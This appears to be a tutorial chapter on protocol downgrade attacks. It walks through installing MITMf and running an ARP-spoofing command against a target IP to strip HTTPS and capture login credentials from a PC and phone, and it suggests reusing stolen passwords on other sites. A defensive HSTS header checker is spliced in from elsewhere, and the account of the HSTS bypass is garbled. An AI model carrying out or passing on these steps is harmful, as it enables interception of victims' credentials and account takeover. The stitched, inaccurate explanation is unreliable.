Post Connection Attacks: Protocol Downgrade Attack

In the previous chapters we managed to sniff login credentials from sites that use plain HTTP, but since many sites now have TLS/SSL protection, we need additional tools.

One of these tools is SSLStrip, written by Moxie Marlinspike. SSLStrip transparently hijacks HTTP traffic, watches for HTTPS links and redirects, and then maps those links to either look-alike HTTP links or homograph-similar HTTPS links.

To solve the problem posed by SSLStrip, a new mechanism called HSTS (HTTP Strict Transport Security headers) was added to most browsers. It protects websites against protocol downgrade attacks and made SSLStrip useless. A couple of years later LeonardoNve (the author of SSLStrip2) found a weakness in HSTS: adding a small extra detail to the request (such as a fourth “w” after the world wide web) confused the router’s DNS, which did not know how to react to it. The attacker can then redirect the request to his own alternative DNS proxy, which responds with an HTTP version of the page. This attack lets us bypass HSTS most of the time.
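From the defender’s side, how much room this trick has depends on how the site’s HSTS policy is set: max-age, includeSubDomains and preload. The checker below is an added example, not code from the original post or from any of the tools named here; it parses a Strict-Transport-Security header from a constructed response and reports the settings that still leave a downgrade window. The one-year floor is an assumption taken from what browser preload lists require.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MIN_MAX_AGE = 31536000  # one year, the floor browser preload lists require (assumption)

# Constructed sample response headers, not captured from any real site.
SAMPLE_NO_HSTS = {"Content-Type": "text/html"}
SAMPLE_WEAK = {"Strict-Transport-Security": "max-age=300"}
SAMPLE_STRONG = {"strict-transport-security": "max-age=63072000; includeSubDomains; preload"}

@dataclass
class HstsReport:
    present: bool
    max_age: Optional[int] = None
    include_subdomains: bool = False
    preload: bool = False
    findings: List[str] = field(default_factory=list)

def analyze_hsts(headers: Dict[str, str]) -> HstsReport:
    # Header names are case-insensitive, so match on the lower-cased name.
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return HstsReport(False, findings=["no HSTS header: any visit can be served over HTTP"])
    report = HstsReport(True)
    # Directives are ';'-separated; max-age takes a value, the other two are bare flags.
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', arg.strip())
            if m:
                report.max_age = int(m.group(1))
        elif name == "includesubdomains":
            report.include_subdomains = True
        elif name == "preload":
            report.preload = True
    if report.max_age is None:
        report.findings.append("max-age missing or malformed: browsers ignore the header")
    elif report.max_age < MIN_MAX_AGE:
        report.findings.append(f"max-age={report.max_age} is below one year")
    if not report.include_subdomains:
        report.findings.append("includeSubDomains missing: a policy on the apex domain would "
                               "otherwise also cover look-alike hosts such as wwww.<apex>")
    if not report.preload:
        report.findings.append("preload missing: policy is trust-on-first-use, so the first "
                               "visit over HTTP is unprotected")
    return report
```

Run it against a site’s own response headers to see which of the three settings would have to change before the downgrade described above stops finding an unprotected request.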

There are many different tools available for protocol downgrade attacks; a couple of examples are Ettercap, Bettercap, MITMproxy, SSLStrip2 + dns2proxy and MITMf. Out of these five we would recommend Bettercap, since it is still being updated to this day. In this guide we will nevertheless be using MITMf, because we only found out about Bettercap later.

To install MITMf, first install the needed packages with apt-get:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-que

Then proceed to install virtualenvwrapper:

pip install virtualenvwrapper

Since the location of virtualenvwrapper.sh may vary depending on your Linux distro, find it with:

find / -name virtualenvwrapper.sh

Then source it, using your own path:

source /usr/local/bin/virtualenvwrapper.sh

Create your virtualenv:

mkvirtualenv MITMf -p /usr/bin/python2.7

Clone the MITMf repository:

git clone https://github.com/byt3bl33d3r/MITMf

cd into the directory, then initialize and update the repo’s submodules:

cd MITMf && git submodule init && git submodule update --recursive

Install the dependencies:

pip install -r requirements.txt

And finally run MITMf:

python mitmf.py --help


If you want, you can start by checking your victim’s ARP table to see whether MITMf manages to spoof ARP.

Proceed to start MITMf with the command:

mitmf --arp --spoof --gateway 192.168.0.1 --target 192.168.0.103 -i wlan1

Leave MITMf running, head over to the client you are targeting and try logging into different websites that run HTTPS. We tried various sites using both a PC running Windows 10 and a OnePlus 5T running Android 8.1. Both the PC and the phone were using Google Chrome as the browser.

Figure: Accessing our school’s student infra with the PC
Figure: Credentials in MITMf

Figure: Accessing Microsoft’s Hotmail.com with the Android phone
Figure: Credentials in MITMf

If MITMf floods the terminal with text and you cannot find the login credentials, copy and paste the wall of text into a text editor such as Leafpad, press Ctrl + F and search for “login”.

If MITMf does not find the login information, it is a good idea to run Wireshark in the background as an extra layer of packet capture.

We have now managed to capture login credentials even though the website uses TLS/SSL protection. Keep in mind that these attacks still might not work on major websites like Facebook or Google. But in a scenario where the attacker is monitoring the victim’s accessed websites with Wireshark, he can find a vulnerable website that the victim is browsing. If the victim decides to log in to that site, the attacker can use the tricks shown above to find the login credentials, and since many people reuse the same email + password combination on many different websites, the attacker might now be able to access better-protected websites like Facebook or Google simply by logging in with the credentials found on a lesser-protected site.
